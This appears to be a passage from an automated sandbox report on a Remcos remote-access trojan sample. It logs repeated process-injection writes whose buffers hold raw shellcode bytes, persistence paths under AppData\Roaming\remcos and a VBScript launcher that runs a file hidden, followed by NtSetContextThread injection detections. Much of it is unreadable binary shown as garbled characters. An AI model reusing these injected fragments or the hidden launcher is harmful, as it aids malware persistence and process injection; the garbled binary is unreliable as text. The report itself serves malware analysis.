èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÃ…Ét èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619628948.60475
WriteProcessMemory
process_identifier: 3716
buffer: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x000c0000
success 1 0
1619628961.2605
WriteProcessMemory
process_identifier: 1880
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÃ…Ét èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619628961.2605
WriteProcessMemory
process_identifier: 1880
buffer: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x000c0000
success 1 0
1619628974.541875
WriteProcessMemory
process_identifier: 3780
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÃ…Ét èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619628974.541875
WriteProcessMemory
process_identifier: 3780
buffer: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x000c0000
success 1 0
1619628976.65
WriteProcessMemory
process_identifier: 628
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÃ…Ét èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000f0000
success 1 0
1619628976.65
WriteProcessMemory
process_identifier: 628
buffer: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x00100000
success 1 0
1619628991.574187
WriteProcessMemory
process_identifier: 4136
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÃ…Ét èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619628991.574187
WriteProcessMemory
process_identifier: 4136
buffer: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x00100000
success 1 0
1619628999.951403
WriteProcessMemory
process_identifier: 4756
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÃ…Ét èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619628999.951403
WriteProcessMemory
process_identifier: 4756
buffer: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x000c0000
success 1 0
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (32 events)
Process injection Process 2144 called NtSetContextThread to modify thread in remote process 2528
Process injection Process 3164 called NtSetContextThread to modify thread in remote process 3400
Process injection Process 3644 called NtSetContextThread to modify thread in remote process 4068
Process injection Process 3904 called NtSetContextThread to modify thread in remote process 3384
Process injection Process 3552 called NtSetContextThread to modify thread in remote process 3284
Process injection Process 3728 called NtSetContextThread to modify thread in remote process 3472
Process injection Process 3260 called NtSetContextThread to modify thread in remote process 2812
